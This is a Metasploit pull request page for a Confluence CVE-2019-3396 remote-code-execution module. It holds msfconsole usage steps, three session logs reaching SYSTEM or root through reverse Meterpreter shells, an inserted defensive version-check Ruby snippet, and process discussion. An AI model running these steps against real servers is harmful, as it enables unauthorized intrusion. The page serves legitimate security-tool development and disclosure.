
Atlassian Confluence RCE exploit (CVE-2019-3396) #11711

Status: Closed (9 commits, 4 participants)

rrockru commented Apr 11, 2019

Description

This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.

The vulnerability exists in the Widget Connector Macro, which allows the "_template" to be injected from the outside for some services, such as YouTube, Viddler, DailyMotion, etc.

The module has been tested on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payloads.

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Vulnerable Application

Affects Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2.

Verification Steps

List the steps needed to make sure this thing works

  • Set up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
  • Start msfconsole
  • use exploit/multi/http/confluence_widget_connector
  • set RHOST <IP>
  • set RPORT <PORT>
  • set SRVHOST <HOST_IP>
  • check
  • You should see "The target is vulnerable"
  • exploit
  • You should get a meterpreter session.

Options

  • TARGETURI: Path to Atlassian Confluence installation ("/" is the default)
  • ListenerTimeout: Time that the Listener will wait for the payload request ("10" is the default)

Scenario

Tested on Confluence 6.8.2 with Windows target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
TARGET => Windows
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Windows 10
[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] Sending stage (179779 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
[*] target.com:8090 - Waiting for exploit to complete...
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

Tested on Confluence 6.8.2 with Java target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload  /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Attempting to execute  /opt/atlassian/confluence/temp/EjpPf.jar
[*] Sending stage (53866 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >

Tested on Confluence 6.8.2 with Linux target

msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
[*] Sending stage (985320 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > quit
[*] Shutting down Meterpreter...

[*] target.com - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >
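The affected ranges quoted under Vulnerable Application are easy to misjudge by eye, since plain string ordering puts 6.6.12 before 6.6.2. The following is an added Ruby example, not code from the PR or the Metasploit module, that encodes those four intervals as a numeric version check a patch-audit or inventory script could call; it assumes Confluence reports plain dotted-numeric version strings.

```ruby
# Added example (not part of the PR or the Metasploit module): a version-range
# check for CVE-2019-3396 built from the ranges listed in the Atlassian advisory.
# Feed it the Confluence version string an instance reports and it returns
# whether that version falls inside an affected interval.

# Affected ranges as [first_affected, first_fixed) half-open intervals.
# A first_affected of nil means "every version below first_fixed".
CVE_2019_3396_RANGES = [
  [nil,      '6.6.12'],
  ['6.7.0',  '6.12.3'],
  ['6.13.0', '6.13.3'],
  ['6.14.0', '6.14.2'],
].freeze

# Parse "6.6.12" into [6, 6, 12] so comparison is numeric per component.
# Plain string comparison would wrongly order "6.6.12" before "6.6.2".
def parse_version(str)
  raise ArgumentError, "bad version string: #{str.inspect}" unless str =~ /\A\d+(\.\d+)*\z/
  str.split('.').map(&:to_i)
end

# Numeric comparison of two parsed versions; missing trailing components count as 0,
# so "6.14" compares equal to "6.14.0".
def compare_versions(a, b)
  width = [a.length, b.length].max
  a_padded = a + [0] * (width - a.length)
  b_padded = b + [0] * (width - b.length)
  a_padded <=> b_padded
end

# True if the given Confluence version lies inside any affected interval.
def vulnerable_to_cve_2019_3396?(version_str)
  v = parse_version(version_str)
  CVE_2019_3396_RANGES.any? do |first_affected, first_fixed|
    above_lower = first_affected.nil? || compare_versions(v, parse_version(first_affected)) >= 0
    below_fixed = compare_versions(v, parse_version(first_fixed)) < 0
    above_lower && below_fixed
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: versions the PR reports testing on, plus fixed releases.
  %w[6.8.2 6.12.0 6.13.0 6.12.3 6.13.3 6.14.2 6.15.0].each do |v|
    puts "#{v}: #{vulnerable_to_cve_2019_3396?(v) ? 'in affected range' : 'not in affected range'}"
  end
end
```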

trenerok commented Apr 11, 2019

👍


wvu-r7 commented Apr 11, 2019

Excellent turnaround time from disclosure to exploit!


wvu-r7 left a comment

Thanks for the submission. This is my first pass of review.


wvu-r7 commented Apr 11, 2019

This PR should come from a topic/feature branch, not master. Please use a topic branch next time. While I don't think it's necessary to close this PR (edit: for technical reasons), someone else might (edit: for process reasons) when they take on this PR. (Please track between PRs if you do.)

rrockru added some commits Apr 11, 2019


bcoles commented Apr 12, 2019

While I don't think it's necessary to close this PR

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Please resubmit from a unique branch.

rrockru referenced this pull request Apr 12, 2019: Atlassian Confluence RCE exploit (CVE-2019-3396) #11717


rrockru commented Apr 12, 2019

Pull request recreated from unique branch: #11717

@bcoles bcoles closed this Apr 12, 2019


wvu-r7 commented Apr 12, 2019

@bcoles: Thanks for that. I have been the chief proponent of that advice for MSF and the reason it's so strongly enforced here. :-)

It is still best practice, and we will continue to strongly recommend it. I was addressing the fact that it's not required for a clean merge if the rest of the process is correct. Additionally, I have informed my team that old diffs are still viewable even if the branch has diverged.

The misconception in the past was that it was technically necessary to close a PR. That is not true. However, it is our process, and we will continue to enforce it.

I'm just a reviewer on this one. (Original comment has been updated.) Thanks!


bcoles commented Apr 12, 2019

@bcoles: Thanks for that. I have been the chief proponent of that advice for MSF and the reason it's so strongly enforced here. :-)

My reply is a pre-written copypasta template, and my motivation is based on observations of doctrine provided by *-r7 members.

I mean, I already have the copypasta reply ready to go. Seems to be a waste not to use it.
